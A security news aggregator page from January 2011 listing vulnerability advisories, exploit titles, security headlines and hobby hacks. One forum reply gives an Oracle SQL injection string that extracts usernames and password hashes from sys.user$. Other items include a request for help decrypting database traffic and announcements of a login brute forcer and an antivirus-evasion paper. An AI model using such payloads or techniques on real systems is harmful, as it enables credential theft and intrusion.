jetlib.sec

Feeds

167618 items (5047 unread) in 27 feeds

• 1337day (was: Inj3ct0r, 1337db) (659 unread)
• OSVDB Vulnerabilities
• Exploit-DB (367 unread)
• SecurityFocus Vulnerabilities (1629 unread)
• Bugtraq (528 unread)
• Full Disclosure (875 unread)
• XSSed (3 unread)
• Packet Storm Security Headlines (525 unread)
• Packet Storm Security Advisories (323 unread)
• Packet Storm Security Exploits (115 unread)
• Packet Storm Security Recent Files (2 unread)
• Packet Storm Security Tools
• Packet Storm Security Misc. Files
• Sophos security news
• Sophos product advisories
• Penetration Testing (11 unread)
• SecuriTeam (10 unread)
• BackTrack Linux Forums
• Threatpost
• SecDocs
• carnal0wnage.attackresearch.com
• Carnal0wnage
• Kernel Fun
• Darknet
• The Exploitant
• Hack a Day
• Wirevolution

Recent items

• January 04, 2011
• 8:59

  McAfee Warns Of More WikiLeaks-Style Hactivist Attacks

   » ‎ Packet Storm Security Headlines
  McAfee Warns Of More WikiLeaks-Style Hactivist Attacks

  Tags:  mcafee warns wikileaks-style  

• 8:59

  BT Takes Steps To End Net Neutrality

   » ‎ Packet Storm Security Headlines
  BT Takes Steps To End Net Neutrality

  Tags:  net steps takes net-neutrality  

• 8:22

  S40 CMS 0.4.1 Cross Site Request Forgery

   » ‎ Packet Storm Security Exploits
  S40 CMS version 0.4.1 change administrative password cross site request forgery exploit.

  Tags:  cross site cms forgery  

• 8:22

  S40 CMS 0.4.1 Cross Site Request Forgery

   » ‎ Packet Storm Security Recent Files
  S40 CMS version 0.4.1 change administrative password cross site request forgery exploit.

  Tags:  cross site cms forgery  

• 8:22

  S40 CMS 0.4.1 Cross Site Request Forgery

   » ‎ Packet Storm Security Misc. Files
  S40 CMS version 0.4.1 change administrative password cross site request forgery exploit.

  Tags:  cross site cms forgery  

• 8:00

  Giving a canoe lawnmower power

   » ‎ Hack a Day
  There’s the quiet serenity of paddling through the backwoods in a canoe, and then there’s this. It’s a lawnmower motor powered canoe that comes complete with steering wheel, throttle, and a stereo system. To keep the craft balanced the driver rides in the front seat while the motor is hanging off the stern of the boat. The [...]

  Tags:  canoe lawnmower motor quiet-serenity steering-wheel backwoods transportation hacks  

• 7:35

  [DCA-00017] LinkSys BEFSR41 Multiple Stored Xss

   » ‎ Bugtraq

  Posted by Crash on Jan 04

  [DCA-00017] LinkSys BEFSR41 Multiple Stored Xss
  
  [Software/Hardware]
  - LinkSys DSL Router BEFSR41 V2
  
  [Vendor Product Description]
  - This Router will allow your computers to share a high-speed Internet
  connection as well as resources, including files and printers.
  
  [Bug Description]
  - Linksys does not validate the input size leading to stored Xss bug.
  - Host name,User Name(PPPoE and PPTP),Customized Applications and
  other fields are vulnerable....
  

  Tags:   

• 7:22

  Music Animation Machine MIDI Player SEH Buffer Overflow

   » ‎ Packet Storm Security Exploits
  Music Animation Machine MIDI player SEH overwrite buffer overflow exploit.

  Tags:  music animation machine music-animation-machine buffer-overflow midi-player  

• 7:22

  Music Animation Machine MIDI Player SEH Buffer Overflow

   » ‎ Packet Storm Security Recent Files
  Music Animation Machine MIDI player SEH overwrite buffer overflow exploit.

  Tags:  music animation machine music-animation-machine buffer-overflow midi-player  

• 7:22

  Music Animation Machine MIDI Player SEH Buffer Overflow

   » ‎ Packet Storm Security Misc. Files
  Music Animation Machine MIDI player SEH overwrite buffer overflow exploit.

  Tags:  music animation machine music-animation-machine buffer-overflow midi-player  

• 7:15

  Mathematica8 on Linux /tmp/MathLink vulnerability

   » ‎ Bugtraq

  Posted by paul . szabo on Jan 04

  The problem that was reported as below for Mathematica7, is present
  also/still in (the "free trial" version of) Mathematica8.
  
  Cheers,
  
  Paul Szabo psz () maths usyd edu au http://www.maths.usyd.edu.au/u/psz/
  School of Mathematics and Statistics University of Sydney Australia
  
  ---
  
  I wrote on 14 May 2010:
  

  Tags:   

• 6:53

  Hackaday sort of going to C.E.S.

   » ‎ Hack a Day
  We have decided that C.E.S. just really isn’t as much of a hacker mecca as we would have wished. Sure there were brilliantly shining walls of new 3d televisions and cellphones and camcorders as far as the eye could see, but there was mainly just tons of marketing for very little innovation, and much less [...]

  Tags:  hackaday isn sort c.e.s c.e.s. cellphones mecca camcorders news  

• 6:23

  Timelapse Photos for All!

   » ‎ Hack a Day
  Find yourself wanting to do some timelapse but lacking the equipment? Why not build your own time lapse rig as seen in instructables how to by [Constructer].  To accomplish this, all you will need is a little wood, screws, a motor, and some batteries.  The how-to says you can add extra voltage to speed up [...]

  Tags:  timelapse equipment photos wood-screws time-lapse own-time digital cameras hacks  

• 4:50

  fbl.apps.rackspace.com XSS

   » ‎ XSSed
  DanBUK has discovered a vulnerability in fbl.apps.rackspace.com, which could be exploited by malicious people to conduct XSS attacks.

  Tags:   

• 4:49

  www.mysql.com XSS

   » ‎ XSSed
  TinKode has discovered a vulnerability in www.mysql.com, which could be exploited by malicious people to conduct XSS attacks.

  Tags:   

• 4:48

  bookings.gulfair.com XSS

   » ‎ XSSed
  trv has discovered a vulnerability in bookings.gulfair.com, which could be exploited by malicious people to conduct XSS attacks.

  Tags:   

• 4:01

  OpenCT 0.6.20

   » ‎ Packet Storm Security Recent Files
  OpenCT implements driver and middle-ware for smart card readers. OpenCT drivers can be used via the ct-api interface, the ifdhandler interface, or its own interface/middle-ware. It implements drivers for several USB crypto tokens, USB smart card readers, serial smart card readers, and PCMCIA smart card readers.

  Tags:  interface card openct smart-card-readers api-interface tokens  

• 4:01

  OpenCT 0.6.20

   » ‎ Packet Storm Security Misc. Files
  OpenCT implements driver and middle-ware for smart card readers. OpenCT drivers can be used via the ct-api interface, the ifdhandler interface, or its own interface/middle-ware. It implements drivers for several USB crypto tokens, USB smart card readers, serial smart card readers, and PCMCIA smart card readers.

  Tags:  interface card openct smart-card-readers api-interface tokens  

• 3:02

  Internet Explorer Zero-Day Accidentally Leaked To Chinese Hackers

   » ‎ Darknet
  First up, happy new year – let’s hope 2011 is an interesting year for the infosec community. Anyway today’s story is about the recently released tool cross_fuzz by Michal Zalewski and an inadvertent leak that have occurred. tl;dr version is something like this: Michal Zalewski writes a DOM fuzzer, fuzzes IE, finds flaws, Chinese...
  
  Read the full post at darknet.org.uk

  
  

  

  Tags:  michal year zalewski read dom michal-zalewski chinese-hackers internet-explorer ExploitsVulnerabilities  

• 2:16

  Fwd: Bruter 1.1 released

   » ‎ Penetration Testing

  Posted by Worawit Wang on Jan 04

  Sorry to everyone. I mistook copying the wrong openssl dll file into
  the binary. I fixed it.
  
  If you have a problem when starting the app, just download it again.
  
  Worawit Wangwarunyoo
  
  ---------- Forwarded message ----------
  From: Worawit Wang <worawita () gmail com>
  Date: Sun, Jan 2, 2011 at 7:52 PM
  Subject: Bruter 1.1 released
  To: pen-test () securityfocus com
  
  Bruter is a parallel network login brute forcer on Win32 platform only.
  It...
  

  Tags:   

• 2:11

  ALITALK 1.9.1.1 Cross Site Scripting

   » ‎ Packet Storm Security Advisories
  ALITALK version 1.9.1.1 suffers from a cross site scripting vulnerability.

  Tags:  cross alitalk site vulnerability  

• 2:11

  ALITALK 1.9.1.1 Cross Site Scripting

   » ‎ Packet Storm Security Recent Files
  ALITALK version 1.9.1.1 suffers from a cross site scripting vulnerability.

  Tags:  cross alitalk site vulnerability  

• 2:11

  ALITALK 1.9.1.1 Cross Site Scripting

   » ‎ Packet Storm Security Misc. Files
  ALITALK version 1.9.1.1 suffers from a cross site scripting vulnerability.

  Tags:  cross alitalk site vulnerability  

• 1:43

  Fwd: Evading AV Signature--Derailing the Anti virus

   » ‎ Full Disclosure

  Posted by Team LOX on Jan 04

  
  

  Tags:   

• 1:02

  Evading Antivirus Signatures

   » ‎ Packet Storm Security Recent Files
  Whitepaper called Evading AV Signatures - Derailing Antivirus.

  Tags:  evading signatures antivirus  

• 1:02

  Evading Antivirus Signatures

   » ‎ Packet Storm Security Misc. Files
  Whitepaper called Evading AV Signatures - Derailing Antivirus.

  Tags:  evading signatures antivirus  

• 0:59

  dealing with v3 certs and CAs

   » ‎ BackTrack Linux Forums
  Scenario:

  • Juicy Secrets in a database (SQL2000)
  • patches are up to date
  • password is long (32 characters)
  • ssl is enforced on the connection (v3) via root CA on domain controller.

  
  Can't haschcat (password too long)
  Can't sniff the user/pass off the wire (encrypted) and ettercap doesn't support v3
  
  I could rdesktop in to the Machine and look at the certificate installed via the certificate snapin. Would this information be enough to generate a cert for ssldump to decode the stream?
  
  However I can get to the CA root (Win 2k3 C:\Windows\system32\certlog)
  Does backtrack have a tool to pull the certs directly from the edb file? (using esentutl.exe isn't helpful)
  
  Or am I going about this in the wrong way and there is a more elegant approach?

  Tags:   

• 0:16

  [local] - Music Animation Machine MIDI Player SEH BOF

   » ‎ Exploit-DB
  [local] - Music Animation Machine MIDI Player SEH BOF

  Tags:   

• 0:00

  Vuln: GIMP Multiple File Plugins Remote Stack Buffer Overflow Vulnerabilities

   » ‎ SecurityFocus Vulnerabilities
  GIMP Multiple File Plugins Remote Stack Buffer Overflow Vulnerabilities

  Tags:  multiple file plugins buffer-overflow-vulnerabilities stack-buffer multiple-file  

• 0:00

  Vuln: Linksys BEFSR41 Multiple HTML Injection Vulnerabilities

   » ‎ SecurityFocus Vulnerabilities
  Linksys BEFSR41 Multiple HTML Injection Vulnerabilities

  Tags:  multiple befsr linksys linksys-befsr41  

• 0:00

  Vuln: Microsoft Windows 'CreateSizedDIBSECTION()' Thumbnail View Stack Buffer Overflow Vulnerability

   » ‎ SecurityFocus Vulnerabilities
  Microsoft Windows 'CreateSizedDIBSECTION()' Thumbnail View Stack Buffer Overflow Vulnerability

  Tags:  microsoft createsizeddibsection windows buffer-overflow-vulnerability stack-buffer thumbnail-view  

• 0:00

  Vuln: Linux Kernel 'net/' Subsystem Socket Filter CVE-2010-4161 Local Information Disclosure Vulnerability

   » ‎ SecurityFocus Vulnerabilities
  Linux Kernel 'net/' Subsystem Socket Filter CVE-2010-4161 Local Information Disclosure Vulnerability

  Tags:  kernel subsystem linux information-disclosure-vulnerability linux-kernel local-information  

• 0:00

  Vuln: Xen 'blkback/blktap/netback' Leaked Kernel Thread Local Denial Of Service Vulnerability

   » ‎ SecurityFocus Vulnerabilities
  Xen 'blkback/blktap/netback' Leaked Kernel Thread Local Denial Of Service Vulnerability

  Tags:  blkback xen blktap service-vulnerability denial-of-service kernel  

• 0:00

  Vuln: Xen 'drivers/xen/blkback/blkback.c' Local Denial Of Service Vulnerability

   » ‎ SecurityFocus Vulnerabilities
  Xen 'drivers/xen/blkback/blkback.c' Local Denial Of Service Vulnerability

  Tags:  blkback xen local service-vulnerability denial-of-service  

• 0:00

  Vuln: Apache Subversion Server Component Multiple Remote Denial Of Service Vulnerabilities

   » ‎ SecurityFocus Vulnerabilities
  Apache Subversion Server Component Multiple Remote Denial Of Service Vulnerabilities

  Tags:  server subversion apache denial-of-service server-component  

• 0:00

  Vuln: Apache APR-util 'apr_brigade_split_line' Denial of Service Vulnerability

   » ‎ SecurityFocus Vulnerabilities
  Apache APR-util 'apr_brigade_split_line' Denial of Service Vulnerability

  Tags:  apr apr-util apache service-vulnerability split-line denial-of-service  

• 0:00

  Vuln: PHP 'ext/imap/php_imap.c' Use After Free Denial of Service Vulnerability

   » ‎ SecurityFocus Vulnerabilities
  PHP 'ext/imap/php_imap.c' Use After Free Denial of Service Vulnerability

  Tags:  ext php imap service-vulnerability denial-of-service  

• 0:00

  Vuln: PHP ZipArchive::getArchiveComment() NULL Pointer Dereference Denial Of Service Vulnerability

   » ‎ SecurityFocus Vulnerabilities
  PHP ZipArchive::getArchiveComment() NULL Pointer Dereference Denial Of Service Vulnerability

  Tags:  ziparchive php getarchivecomment service-vulnerability null-pointer denial-of-service  

• 0:00

  Vuln: PHP 'xml_utf8_decode()' UTF-8 Input Validation Vulnerability

   » ‎ SecurityFocus Vulnerabilities
  PHP 'xml_utf8_decode()' UTF-8 Input Validation Vulnerability

  Tags:  xml php decode input-validation vulnerability  

• 0:00

  Vuln: PHP 'php/ext/xml/xml.c' Integer Overflow Vulnerability

   » ‎ SecurityFocus Vulnerabilities
  PHP 'php/ext/xml/xml.c' Integer Overflow Vulnerability

  Tags:  ext xml php integer-overflow-vulnerability  

• 0:00

  Vuln: Linux Kernel 'sctp_outq_flush()' Denial of Service Vulnerability

   » ‎ SecurityFocus Vulnerabilities
  Linux Kernel 'sctp_outq_flush()' Denial of Service Vulnerability

  Tags:  sctp kernel linux service-vulnerability linux-kernel denial-of-service  

• 0:00

  Vuln: Linux Kernel ALSA 'sound/core/control.c' Local Integer Overflow Vulnerability

   » ‎ SecurityFocus Vulnerabilities
  Linux Kernel ALSA 'sound/core/control.c' Local Integer Overflow Vulnerability

  Tags:  kernel alsa linux integer-overflow-vulnerability linux-kernel core-control  

• January 03, 2011
• 23:22

  Windows Thumbnail Buffer Overflow

   » ‎ Packet Storm Security Recent Files
  Whitepaper / Presentation called A Vulnerability in My Heart that discusses a Windows thumbnail buffer overflow vulnerability.

  Tags:  buffer thumbnail windows buffer-overflow-vulnerability whitepaper  

• 23:22

  Windows Thumbnail Buffer Overflow

   » ‎ Packet Storm Security Misc. Files
  Whitepaper / Presentation called A Vulnerability in My Heart that discusses a Windows thumbnail buffer overflow vulnerability.

  Tags:  buffer thumbnail windows buffer-overflow-vulnerability whitepaper  

• 21:55

  Microsoft And Google Clash Over Zero Day Flaw Release

   » ‎ Packet Storm Security Headlines
  Microsoft And Google Clash Over Zero Day Flaw Release

  Tags:  and microsoft clash zero-day google  

• 21:48

  U.S. DHS Goes After Vietnamese Hackers, Identity Thieves

   » ‎ Packet Storm Security Headlines
  U.S. DHS Goes After Vietnamese Hackers, Identity Thieves

  Tags:  after dhs vietnamese thieves hackers  

• 21:48

  Court OKs Searches Of Cell Phones Without Warrant

   » ‎ Packet Storm Security Headlines
  Court OKs Searches Of Cell Phones Without Warrant

  Tags:  cell searches oks warrant cell-phones  

• 21:46

  [papers] - Windows Thumbnail Buffer Overflow: A Vulnerability in My Heart - [CVE: 2010-3970]

   » ‎ Exploit-DB
  [papers] - Windows Thumbnail Buffer Overflow: A Vulnerability in My Heart - [CVE: 2010-3970]

  Tags:   

• 20:22

  Ace Video Workshop 1.2.0.0 DLL Hijack

   » ‎ Packet Storm Security Exploits
  Ace Video Workshop version 1.2.0.0 DLL hijacking exploit.

  Tags:  workshop video ace ace-video-workshop hijacking  

• 20:22

  Ace Video Workshop 1.2.0.0 DLL Hijack

   » ‎ Packet Storm Security Recent Files
  Ace Video Workshop version 1.2.0.0 DLL hijacking exploit.

  Tags:  workshop video ace ace-video-workshop hijacking  

• 20:22

  Ace Video Workshop 1.2.0.0 DLL Hijack

   » ‎ Packet Storm Security Misc. Files
  Ace Video Workshop version 1.2.0.0 DLL hijacking exploit.

  Tags:  workshop video ace ace-video-workshop hijacking  

• 19:52

  Secunia Security Advisory 42777

   » ‎ Packet Storm Security Advisories
  Secunia Security Advisory - Multiple vulnerabilities have been reported in Amoeba CMS, which can be exploited by malicious people to conduct SQL injection and cross-site request forgery attacks.

  Tags:  advisory secunia security security-advisory amoeba  

• 19:52

  Secunia Security Advisory 42810

   » ‎ Packet Storm Security Advisories
  Secunia Security Advisory - A vulnerability has been reported in MediaWiki, which can be exploited by malicious people to bypass certain security restrictions and conduct cross-site request forgery attacks.

  Tags:  advisory secunia security security-restrictions security-advisory  

• 19:52

  Secunia Security Advisory 42807

   » ‎ Packet Storm Security Advisories
  Secunia Security Advisory - Fedora has issued an update for opensc. This fixes some vulnerabilities, which can be exploited by malicious people to compromise an application using the library.

  Tags:  advisory secunia security fedora security-advisory  

• 19:52

  Secunia Security Advisory 42798

   » ‎ Packet Storm Security Advisories
  Secunia Security Advisory - A vulnerability has been discovered in ImgBurn, which can be exploited by malicious people to compromise a user's system.

  Tags:  advisory secunia security s-system security-advisory  

• 19:52

  Secunia Security Advisory 42806

   » ‎ Packet Storm Security Advisories
  Secunia Security Advisory - Fedora has issued an update for drupal-views. This fixes multiple vulnerabilities, which can be exploited by malicious people to conduct cross-site scripting attacks.

  Tags:  advisory secunia security fedora security-advisory  

• 19:52

  Secunia Security Advisory 42768

   » ‎ Packet Storm Security Advisories
  Secunia Security Advisory - A vulnerability has been reported in CrawlTrack, which can be exploited by malicious people to compromise a vulnerable system.

  Tags:  advisory secunia security security-advisory crawltrack  

• 19:52

  Secunia Security Advisory 42775

   » ‎ Packet Storm Security Advisories
  Secunia Security Advisory - Some vulnerabilities have been reported in Geeklog, which can be exploited by malicious people to conduct cross-site scripting attacks.

  Tags:  advisory secunia security security-advisory geeklog  

• 17:55

  Novell GroupWise Internet Agent Content-Type String Parsing Code Execution Vulnerability

   » ‎ SecuriTeam
  This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Novell GroupWise.

  -

  Make your website safer. Use external penetration testing service. First report ready in one hour!

  Tags:  novell code groupwise novell-groupwise-internet-agent code-execution safer-use  

• 17:54

  Cisco ICM Setup Manager Agent.exe HandleQueryNodeInfoReq Code Execution Vulnerability

   » ‎ SecuriTeam
  This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Cisco ICM.

  -

  Make your website safer. Use external penetration testing service. First report ready in one hour!

  Tags:  code vulnerability setup cisco-icm manager-agent code-execution safer-use arbitrary-code  

• 17:54

  Cisco ICM Setup Manager Agent.exe AgentUpgrade Code Execution Vulnerability

   » ‎ SecuriTeam
  This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Cisco Unified ICM.

  -

  Make your website safer. Use external penetration testing service. First report ready in one hour!

  Tags:  code vulnerability setup cisco-unified cisco-icm manager-agent code-execution safer-use arbitrary-code  

• 17:49

  Juniper Secure Access Series meeting_testjava.cgi Cross site Scripting Vulnerability

   » ‎ SecuriTeam
  This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Juniper SA Series devices.

  -

  Make your website safer. Use external penetration testing service. First report ready in one hour!

  Tags:  vulnerability access series juniper-secure safer-use arbitrary-code attackers  

• 17:49

  RealNetworks RealPlayer Multi-Rate Audio Code Execution Vulnerability

   » ‎ SecuriTeam
  This vulnerability allows attackers to execute arbitrary code on vulnerable installations of RealNetworks RealPlayer.

  -

  Make your website safer. Use external penetration testing service. First report ready in one hour!

  Tags:  code realplayer realnetworks code-execution safer-use arbitrary-code  

• 17:49

  Mozilla Firefox NewIdArray Integer Overflow Code Execution Vulnerability

   » ‎ SecuriTeam
  This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Mozilla Firefox.

  -

  Make your website safer. Use external penetration testing service. First report ready in one hour!

  Tags:  code mozilla firefox overflow-code integer-overflow code-execution  

• 17:49

  Cisco ICM Setup Manager Agent.exe HandleUpgradeAll Remote Code Execution Vulnerability

   » ‎ SecuriTeam
  This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Cisco ICM.

  -

  Make your website safer. Use external penetration testing service. First report ready in one hour!

  Tags:  code vulnerability setup cisco-icm manager-agent code-execution safer-use arbitrary-code  

• 17:31

  Re: Agnitio Security Code Review Tool v1.1 released

   » ‎ Full Disclosure

  Posted by Shyaam on Jan 03

  Good stuff David.
  
  Shyaam
  

  Tags:   

• 17:21

  Chatango Group Chat Web-Application Cross-Site Request Forgery Vulnerability

   » ‎ Full Disclosure

  Posted by Kevin Killgore on Jan 03

  <?KvK~
  
  ############################################################################
  Chatango Group Chat Web-Application Cross-Site Request Forgery Vulnerability
  ############################################################################
  
  ++++++++++++++++++++++++
  ~Application Description
  ++++++++++++++++++++++++
  Chatango is an organization that freely provides chat box services named
  "Chatango groups". These groups can be accessed...
  

  Tags:   

• 17:20

  PayPal Send Money Cross-Site Scripting Vulnerability

   » ‎ Full Disclosure

  Posted by Nathan Power on Jan 03

  --------------------------------------------------------------------------------
  
  1. Summary:
  
  PayPal's send money feature is affected by an XSS (cross-site scripting)
  vulnerability.
  
  --------------------------------------------------------------------------------
  
  2. Description:
  
  When sending money via PayPal, the sender has an option to input a message
  along with the money being sent. A malicious attacker can inject XSS code
  into this message...
  

  Tags:   

• 17:17

  [ACM, Ariadne Content Manager] unauth. SQL injection + user enumeration

   » ‎ Full Disclosure

  Posted by Andrea Purificato on Jan 03

  Hi sec-folks,
  
  I recently discuss with Ariadne team to public disclose two new
  different vulnerabilities found in Ariadne Content Manager (ACM).
  
  As the name says, ACM is an enterprise solution for content management
  mainly used by big private and public companies and institutions.
  
  This is the site of the product: http://www.ariadnecontentmanager.com
  
  § The most critical vulnerability is an "unauthenticated SQL injection",
  which can...
  

  Tags:   

• 17:16

  www.eVuln.com : SQL Injection in WikLink

   » ‎ Full Disclosure

  Posted by Aliaksandr Hartsuyeu on Jan 03

  www.eVuln.com advisory:
  SQL Injection in WikLink
  Summary: http://evuln.com/vulns/170/summary.html
  Details: http://evuln.com/vulns/170/description.html
  
  -----------Summary-----------
  eVuln ID: EV0170
  Software: WikLink
  Vendor: n/a
  Version: 0.1.3
  Critical Level: medium
  Type: SQL Injection
  Status: Unpatched. No reply from developer(s)
  PoC: Available
  Solution: Not available
  Discovered by: Aliaksandr Hartsuyeu ( http://evuln.com/ )...
  

  Tags:   

• 17:14

  Agnitio Security Code Review Tool v1.1 released

   » ‎ Full Disclosure

  Posted by David Rook on Jan 03

  Hi,
  
  I've released an update to Agnitio which I hope will help people
  carryout security focused code reviews and find vulnerabilities in the
  source code they are reviewing.
  
  The major changes in v1.1 are listed below:
  
  1) The first version of the principles of secure development and
  checklist questions knowledge base.
  
  2) Pass or fail option for reports.
  
  3) Include your own logo in the reports.
  
  4) Highlight unanswered checklist questions.
  
  For...
  

  Tags:   

• 16:29

  BT 4 R2 + Intel GMA 4500M graphics Problem

   » ‎ BackTrack Linux Forums
  1. ja ich habe gegurgelt bis zum ultimatum
  2. ja ich habe dieses forum ausführlich durchsucht
  3. ich bin linux anfänger
  
  so ich bin besitzer eines Fujitsu-Siemens AMILO 18.4in Notebook Li3910 welches ich mir ausschlieslich um linux user zu werden angeschaft habe. hierbei achtete ich eigentlich nur darauf das der wlan adapter kompatibel ist also rtl8187<--oder so ähnlich der funzt auch problemlos. nun begann ich mit ubuntu zu experimentieren vers.10.04 ich war erstaunt und installte gleich darauf vers 10.10 alles toll bis auf das ich nur manche progs zum laufen brachte aber auf jedenfall bei beiden vers absolut keine grafik probleme nun bin ich auf BT4 r2 gestossen habs installt und von anfang an probs mit der grafik manchmal gehts aber meistens ist das bild vollständig 'verwaschen' also vollgekritzelt man kann nichts lesen oder erkennen (in allen auflösungen) .
  dieses problem haben wohl auch ein paar englisch sprechende benutzer diese forums aber niemand hat bisher eine lösung dafür gepostet und ich bin echt am verzweifeln weiss niemand wie man den Intel GMA 4500M chip zum laufen bringt ?

  Tags:   

• 16:07

  Republicans Prioritize WikiLeaks Investigation

   » ‎ Packet Storm Security Headlines
  Republicans Prioritize WikiLeaks Investigation

  Tags:  wikileaks prioritize investigation republicans  

• 16:07

  Hackers Hit Tunisian Websites

   » ‎ Packet Storm Security Headlines
  Hackers Hit Tunisian Websites

  Tags:  websites hit tunisian hackers  

• 16:07

  IE 0day Accidentally Leaked To Chinese Hackers

   » ‎ Packet Storm Security Headlines
  IE 0day Accidentally Leaked To Chinese Hackers

  Tags:  day leaked accidentally chinese-hackers  

• 16:07

  Hackers Attack Brazilian Government's Website

   » ‎ Packet Storm Security Headlines
  Hackers Attack Brazilian Government's Website

  Tags:  brazilian attack website brazilian-government hackers  

• 15:11

  Mathematica8 on Linux /tmp/MathLink vulnerability

   » ‎ Full Disclosure

  Posted by paul . szabo on Jan 03

  The problem that was reported as below for Mathematica7, is present
  also/still in (the "free trial" version of) Mathematica8.
  
  Cheers,
  
  Paul Szabo psz () maths usyd edu au http://www.maths.usyd.edu.au/u/psz/
  School of Mathematics and Statistics University of Sydney Australia
  
  ---
  
  I wrote on 14 May 2010:
  

  Tags:   

• 15:00

  More bike-controlled Google-travelling

   » ‎ Hack a Day
  This is becoming such a popular hack we figure someone needs to come up with a name for it like Google-travelling or Google-cising (exercising with Google). It’s a bike controller for Google Earth. [Braingram] broke out his road bike, setting it up in the trainer in front of his laptop. If you already have a [...]

  Tags:  google google-travelling bike road-bike hack arduino hacks  

• 14:00

  Driving an 8-digit split flap display

   » ‎ Hack a Day
  [Markus] got his hands on a split-flap display and built a controller for it. These sometimes can be found on really old alarm clocks, but [Markus] was a lucky-duck and managed to acquire this large 8-digit display which previously made its home in a railroad station. They work like a Rolodex, mounting flaps around a cylinder [...]

  Tags:  split display digit markus split-flap alarm-clocks lucky-duck clock hacks  

• 14:00

  [webapps / 0day] - Sahana Agasti

   » ‎ 1337day (was: Inj3ct0r, 1337db)
  [webapps / 0day] - Sahana Agasti

  Tags:  day agasti sahana  

• 13:49

  ProFTPD TELNET_IAC Code Execution Vulnerability

   » ‎ SecuriTeam
  This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of ProFTPD.

  -

  Make your website safer. Use external penetration testing service. First report ready in one hour!

  Tags:  code vulnerability proftpd code-execution safer-use  

• 13:49

  Novell ZENworks Handheld Management ZfHIPCND.exe Code Execution Vulnerability

   » ‎ SecuriTeam
  This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Novell ZENworks Handheld Management.

  -

  Make your website safer. Use external penetration testing service. First report ready in one hour!

  Tags:  novell zenworks handheld novell-zenworks code-execution safer-use  

• 13:44

  Microsoft Word RTF File Parsing Stack Buffer Overflow Vulnerability

   » ‎ SecuriTeam
  Remote exploitation of a stack buffer overflow vulnerability in Microsoft Corp.'s Word could allow attackers to execute arbitrary code under the privileges of the targeted user.

  -

  Make your website safer. Use external penetration testing service. First report ready in one hour!

  Tags:  buffer microsoft word buffer-overflow-vulnerability stack-buffer safer-use  

• 13:44

  Symantec IM Manager SummaryReportGroup.lgx Definition File SQL Injection Vulnerabilities

   » ‎ SecuriTeam
  This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Symantec IM Manager.

  -

  Make your website safer. Use external penetration testing service. First report ready in one hour!

  Tags:  definition symantec lgx manager-summaryreportgroup safer-use arbitrary-code attackers  

• 13:44

  Novell GroupWise Internet Agent Content-Type Multiple Value Parsing Code Execution Vulnerability

   » ‎ SecuriTeam
  This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Novell GroupWise.

  -

  Make your website safer. Use external penetration testing service. First report ready in one hour!

  Tags:  novell code groupwise novell-groupwise-internet-agent code-execution safer-use  

• 13:39

  RealNetworks RealPlayer Media Properties Header Parsing Code Execution Vulnerability

   » ‎ SecuriTeam
  This vulnerability allows attackers to execute arbitrary code on vulnerable installations of RealNetworks RealPlayer.

  -

  Make your website safer. Use external penetration testing service. First report ready in one hour!

  Tags:  code realplayer realnetworks code-execution safer-use arbitrary-code  

• 13:39

  RealNetworks RealPlayer Advanced Audio Coding Code Execution Vulnerability

   » ‎ SecuriTeam
  This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of RealNetworks Real Player.

  -

  Make your website safer. Use external penetration testing service. First report ready in one hour!

  Tags:  code vulnerability realnetworks code-execution safer-use advanced-audio-coding  

• 12:51

  Controlling real objects using Minecraft

   » ‎ Hack a Day
  Most augmented reality takes images of the real world and superimposes virtual data on top of them. [Michael Winston Dales] went a different direction, using the virtual world of Minecraft to control objects in the physical world. In the video after the break you can see him use switches that he built inside the game [...]

  Tags:  world controlling minecraft michael-winston-dales virtual-data virtual-world real-world misc hacks  

• 12:40

  Re: Oracle Pentest

   » ‎ Penetration Testing

  Posted by Dan Crowley on Jan 03

  This could be a result of your injection string being loaded into
  multiple queries, for which there are varying numbers of columns being
  selected. There's two options I can think of:
  
  1) Concatenate the column with the results of a subquery, like so:
  ' || (select rownum ROW, name || '-' || password from sys.user$ where
  type#=1 and ROW = 1) || '
  
  2) Use blind SQL injection techniques or, given verbose errors (which
  I'm assuming aren't being given...
  

  Tags:   

• 11:40

  Bruter 1.1 released

   » ‎ Penetration Testing

  Posted by Worawit Wang on Jan 03

  Bruter is a parallel network login brute forcer on Win32 platform only.
  It currently (1.1) supports following services:
  FTP, HTTP, IMAP, MSSQL, MySQL, POP3, PgSQL, SIP, SMB, SMTP, SNMP,
  SSH2, Telnet, VNC, Web-Form
  
  Source code, binary and documentation:
  http://sourceforge.net/projects/worawita
  
  Changelog (since 1.0):
  - Added protocols: PgSQL, SIP
  - Auto detect "Max Attempt/Connection" when set it to -1
  - Add "Password First"...
  

  Tags:   

• 11:11

  Geeklog 1.7.1 Cross Site Scripting

   » ‎ Packet Storm Security Exploits
  Geeklog versions 1.7.1 and below suffers from a cross site scripting vulnerability.

  Tags:  cross geeklog site vulnerability  

• 11:11

  Geeklog 1.7.1 Cross Site Scripting

   » ‎ Packet Storm Security Recent Files
  Geeklog versions 1.7.1 and below suffers from a cross site scripting vulnerability.

  Tags:  cross geeklog site vulnerability  

• 11:11

  Geeklog 1.7.1 Cross Site Scripting

   » ‎ Packet Storm Security Misc. Files
  Geeklog versions 1.7.1 and below suffers from a cross site scripting vulnerability.

  Tags:  cross geeklog site vulnerability  

• 10:50

  [ACM, Ariadne Content Manager] unauth. SQL injection + user enumeration

   » ‎ Bugtraq

  Posted by Andrea Purificato on Jan 03

  Hi sec-folks,
  
  I recently discuss with Ariadne team to public disclose two new
  different vulnerabilities found in Ariadne Content Manager (ACM).
  
  As the name says, ACM is an enterprise solution for content management
  mainly used by big private and public companies and institutions.
  
  This is the site of the product: http://www.ariadnecontentmanager.com
  
  § The most critical vulnerability is an "unauthenticated SQL injection",
  which can...
  

  Tags:   

• 10:29

  Geeklog 1.7.1

   » ‎ Bugtraq

  Posted by YGN Ethical Hacker Group on Jan 03

  =========================================================
  Geeklog 1.7.1 <= Cross Site Scripting Vulnerability
  =========================================================
  
  1. OVERVIEW
  
  The Geeklog was vulnerable to Cross Site Scripting in its
  administration backend.
  
  2. BACKGROUND
  
